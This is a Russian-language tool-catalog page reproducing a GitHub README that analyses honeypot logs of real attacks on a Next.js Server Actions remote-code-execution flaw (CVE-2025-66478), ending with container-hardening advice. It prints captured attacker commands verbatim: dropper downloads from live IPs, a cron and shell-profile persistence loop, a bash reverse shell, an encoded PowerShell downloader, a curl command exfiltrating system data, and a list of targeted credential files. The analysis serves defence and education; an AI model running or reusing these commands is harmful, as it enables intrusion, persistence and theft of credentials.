Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-66478 — Реальный анализ журналов атак CVE-2025-66478 (RCE в Server Actions Next.js) с образцами вредоносного ПО, отслеживанием IP-адресов атакующих и уроками по усилению безопасности контейнеров. | Kitploit
Инструменты/GitHubGitHub/exptechtw/cve-2025-66478
Безопасность контейнеровАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийФорензикаАнализ вредоносных программРазведка угрозОбучение и ОбразованиеРеагирование на Инциденты
GitHubexptechtw/cve-2025-66478

CVE-2025-66478

Реальный анализ журналов атак CVE-2025-66478 (RCE в Server Actions Next.js) с образцами вредоносного ПО, отслеживанием IP-адресов атакующих и уроками по усилению безопасности контейнеров.

259 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий

CVE-2025-66478 - Анализ журналов реальных атак на RCE-уязвимость в Next.js Server Actions

Обзор

В этом проекте собраны журналы реальных атак, зафиксированные приложением Next.js 15.1.2, которое было доступно в интернете и работало в Docker-контейнере. Эти журналы показывают, как уязвимость CVE-2025-66478 массово сканируется и эксплуатируется в дикой природе многочисленными автоматизированными инструментами атак.

Период записи: 2025-12-04 ~ 2025-12-06 (примерно 48 часов)

Сведения об окружении:

  • Фреймворк: Next.js 15.1.2
  • Среда выполнения: Bun v1.2.20
  • Контейнер: Docker (Alpine Linux)
  • Часовой пояс: Asia/Taipei

Статистика типов атак

1. Загрузка и выполнение вредоносного ПО (Dropper/Downloader)

Злоумышленники использовали уязвимость для выполнения команд, загружающих и запускающих вредоносное ПО.

IP источника атакиURL вредоносной нагрузкиОписание
216.158.232.43http://216.158.232.43:12000/sex.shБотнет/майнер
38.207.161.212http://38.207.161.212/agentВредоносная программа-агент
43.156.63.124http://43.156.63.124/tsdCron-бэкдор
154.38.121.219res.qiqigece.top/nginx3Вредоносное ПО, маскирующееся под nginx
47.79.42.91iot.632313373.xyz/nz.shСкрипт IoT-ботнета
47.79.65.237sup001.oss-cn-hongkong.aliyuncs.com/python1.shМайнер/бэкдор
103.135.101.15http://103.135.101.15/wocaosinm.shВредоносный скрипт
38.12.24.231http://38.12.24.231/kworkerВредоносное ПО, маскирующееся под kernel worker
128.199.194.97http://128.199.194.97:9001/setup2.shСкрипт инициализации

Примеры команд атак

root@kitploit:~
# 典型的 dropper 攻擊
curl -fsSL http://38.207.161.212/agent -o /tmp/.a && chmod +x /tmp/.a && /tmp/.a

# 植入 cron 持久化後門
curl -s -o /etc/cron.hourly/tsd http://43.156.63.124/tsd && chmod +x /etc/cron.hourly/tsd

# 複雜的持久化攻擊(嘗試多種下載方式 + cron + bashrc)
u='http://38.12.24.231/kworker'; n='kworker';
for d in $HOME/.config/sys_monitor /tmp/.sys_monitor /dev/shm/.sys_monitor /var/tmp/.sys_monitor; do
  mkdir -p $d;
  if [ -w $d ]; then
    p="$d/$n";
    (curl -ks $u -o $p || wget -q --no-check-certificate $u -O $p || python3 -c "import urllib.request;urllib.request.urlretrieve('$u','$p')");
    chmod +x $p;
    nohup $p >/dev/null 2>&1 &
    (crontab -l 2>/dev/null | grep -v $n; echo "* * * * * $p >/dev/null 2>&1") | crontab -;
    echo "$p >/dev/null 2>&1 &" >> ~/.bashrc;
    echo "$p >/dev/null 2>&1 &" >> ~/.zshrc;
  fi;
done

2. Реверс-шелл (Reverse Shell)

Злоумышленники пытались установить обратное shell-соединение для получения интерактивного доступа.

root@kitploit:~
# Bash 反向 shell
bash -c "bash -i >& /dev/tcp/154.26.192.32/19899 0>&1"

3. PowerShell-атаки (ошибочно нацеленные на Windows)

Злоумышленники предполагали, что цель работает на Windows, и пытались выполнять PowerShell-команды.

root@kitploit:~
# Base64 編碼的惡意 PowerShell
powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAYwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADUANgAuADIAMwA0AC4AMgAwADkALgAxADAAMwA6ADYAMwA5ADMAOAAvAG4AcgBDAHIAUQAnACkA

# 解碼後:
# IEX (New-Object System.Net.Webclient).DownloadString('http://156.234.209.103:63938/nrCrQ')

# 數學計算用於漏洞確認
powershell -c "41*271"      # = 11111(特徵碼確認)
powershell -c "44225*41002" # = 1814113450

4. Сбор информации (Information Gathering)

Злоумышленники пытались собрать информацию о системе для последующих атак.

root@kitploit:~
# 系統資訊收集並外傳
curl http://38.60.212.106:8000/?data=`(hostname;ip addr show;id;ip route show;ip neigh show;route -n;cat /etc/passwd;hostname -I) | base64 -w 0`

5. Кража учётных данных (Credential Harvesting)

Злоумышленники пытались прочитать различные чувствительные файлы и учётные данные.

Чувствительные пути, которые пытались прочитать

6. Утечка переменных окружения

Переменные окружения контейнера, которые удалось выгрузить через уязвимость:

root@kitploit:~
HOSTNAME=6973aeebae41
BUN_INSTALL_BIN=/usr/local/bin
HOME=/root
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/bun-node-fallback-bin
PWD=/app
TZ=Asia/Taipei
NODE_ENV=production
BUN_RUNTIME_TRANSPILER_CACHE_PATH=0

7. DNS-эксфильтрация (DNS Exfiltration)

Злоумышленники использовали DNS-запросы для эксфильтрации данных или подтверждения уязвимости:

root@kitploit:~
ping 5a58e4a0.log.dnslog.pp.ua.

Причины неудач атак

Большинство атак провалилось из-за минималистичности контейнера на базе Alpine Linux:

Отсутствующий инструментПоследствие
curlНевозможно загрузить вредоносную нагрузку
bash

Хотя wget доступен, некоторые вредоносные скрипты внутри по-прежнему зависят от curl или bash, что приводит к сбою их выполнения.


Примеры декодирования Base64

Журналы содержат большое количество данных в кодировке Base64. Ниже приведены некоторые результаты декодирования:

Утечка информации о системе

root@kitploit:~
# digest: 'cm9vdAo='
解碼: root

# digest: 'dGVzdAo='
解碼: test

# digest: 'dnVsbmVyYWJpbGl0eV90ZXN0Cg=='
解碼: vulnerability_test

# digest: 'dWlkPTAocm9vdCkgZ2lkPTAocm9vdCkgZ3JvdXBzPTAocm9vdCksMShiaW4pLDIoZGFlbW9uKSwzKHN5cyksNChhZG0pLDYoZGlzayksMTAod2hlZWwpLDExKGZsb3BweSksMjAoZGlhbG91dCksMjYodGFwZSksMjcodmlkZW8pCg=='
解碼: uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)

Утечка листинга каталога

root@kitploit:~
# /tmp 目錄內容
dG90YWwgMjAKZHJ3eHJ3eHJ3dCAgICAxIHJvb3QgICAgIHJvb3QgICAgICAgICAgNDA5NiBEZWMgIDUgMTg6MDAgLgpkcnd4ci14ci14ICAgIDEgcm9vdCAgICAgcm9vdCAgICAgICAgICA0MDk2IERlYyAgNCAxMzozNiAuLgotcnd4ci14ci14ICAgIDEgcm9vdCAgICAgcm9vdCAgICAgICAgICA5ODQ4IERlYyAgNSAxODowMCBJTlNUQUxMCg==

解碼:
total 20
drwxrwxrwt    1 root     root          4096 Dec  5 18:00 .
drwxr-xr-x    1 root     root          4096 Dec  4 13:36 ..
-rwxr-xr-x    1 root     root          9848 Dec  5 18:00 INSTALL

Статистика IP-адресов источников атак

Ниже перечислены IP-адреса источников атак, зафиксированные в журналах:


Методы эксплуатации уязвимости (Attack Vectors)

Вызов Server Action

Злоумышленники пытались вызвать несуществующие Server Actions:

root@kitploit:~
Failed to find Server Action "dev-only-action"
Failed to find Server Action "non_existent_action_id"
Failed to find Server Action "test"
Failed to find Server Action "x"

Утечка информации в сообщениях об ошибках

Злоумышленники использовали поле digest в сообщениях об ошибках для утечки данных:

root@kitploit:~
Error: x
  digest: 'cm9vdAo='  // Base64 編碼的 'root'

Ключевые выводы

1. Лучшие практики безопасности контейнеров

  • Минимизация образов: использование минималистичных базовых образов (например, Alpine) уменьшает поверхность атаки
  • Удаление ненужных инструментов: не устанавливайте такие инструменты, как curl, bash, python, которые могут быть использованы во зло
  • Read-only файловая система: запускайте контейнер с параметром --read-only
  • Пользователь без прав root: запускайте приложение от непривилегированного пользователя

2. Устранение уязвимости

  • Обновите Next.js до исправленной версии
  • Проверяйте входные данные Server Action
  • Внедрите правила WAF для фильтрации подозрительных запросов

3. Мониторинг и обнаружение

  • Отслеживайте аномальное выполнение дочерних процессов
  • Отслеживайте исходящие сетевые подключения
  • Отслеживайте попытки доступа к чувствительным файлам

Отказ от ответственности

Данный проект предназначен исключительно для образовательных и исследовательских целей в области кибербезопасности. Все зафиксированные атаки — это реальные попытки атак, направленные на исследовательский honeypot. Не используйте эту информацию в незаконных целях.


Образцы вредоносного ПО

В этом проекте собраны реальные образцы вредоносного ПО, извлечённые из журналов атак и скачанные для анализа. Подробный анализ см.:

malware_samples/ANALYSIS.md

Полученные образцы

Сводка методов атак

  1. nz.sh - установка агента мониторинга Nezha для удалённого наблюдения за скомпрометированным хостом
  2. tsd.sh + tsd - создание множественных механизмов устойчивости (cron + systemd + rc.local)
  3. init.sh + agent - полноценный каркас бэкдора с поддержкой нескольких систем, автоматическим перезапуском и ведением журналов

Связанные ресурсы

  • Next.js Security Advisories
  • OWASP - Command Injection
  • MITRE ATT&CK - Execution

Лицензия

MIT License

Скачать инструмент
КатегорияПуть
Облачные учётные данные/root/.aws/credentials, /root/.aws/config
/root/.config/gcloud/credentials.db
/root/.config/gcloud/application_default_credentials
SSH-ключи/root/.ssh/id_rsa, /root/.ssh/config
Учётные данные Git/root/.git-credentials, /root/.gitconfig
Контейнер/K8s/root/.docker/config, /root/.kube/config
/var/lib/kubelet/config.yaml
Приложения/proc/self/cwd/serviceAccountKey.json (Firebase)
/proc/self/cwd/prisma/.env, /proc/self/cwd/prisma/schema.prisma
История Shell/root/.bash_history, /root/.zsh_history
Облачные инструменты/root/.ossutilconfig (Alibaba Cloud OSS)
/root/.npmrc
Системные настройки/etc/ansible/ansible.cfg, /etc/passwd, /etc/shadow
Невозможно выполнить bash-специфичный синтаксис (например, реверс-шелл)
powershellWindows-атаки неэффективны
pythonНевозможно использовать Python-загрузчик
IP-адресСтрана/регион (предположительно)Тип атаки
216.158.232.43СШАDropper
38.165.44.205СШАDropper
23.95.44.80СШАDropper
154.38.121.219ГонконгMalware (nginx3)
38.207.161.212СШАAgent
43.156.63.124КитайCron-бэкдор
47.79.42.91Китай (Alibaba Cloud)IoT-ботнет
47.79.65.237Китай (Alibaba Cloud)Майнер
119.45.243.154Китай (Tencent Cloud)Майнер
144.22.210.54БразилияDropper
217.60.249.228ШвецияDropper
154.26.192.32СШАРеверс-шелл
156.234.209.103НеизвестноPowerShell-нагрузка
38.60.212.106СШАСбор информации
103.135.101.15ВьетнамБотнет
128.199.194.97Сингапур (DigitalOcean)Setup-скрипт
38.12.24.231СШАУстойчивое вредоносное ПО
ФайлТипРазмерИсточникУровень угрозы
nz.shShell Script931 Biot.632313373.xyzСредний
tsd.shShell Script1.7 KB43.156.63.124Высокий
tsdELF 64-bit6.8 MB43.156.63.124Высокий
init.shShell Script6.1 KBAWS S3Критический
agentELF 64-bit23.7 MBAWS S3Критический
Agtisx.exePE32+ (Windows)24.0 MBAWS S3Критический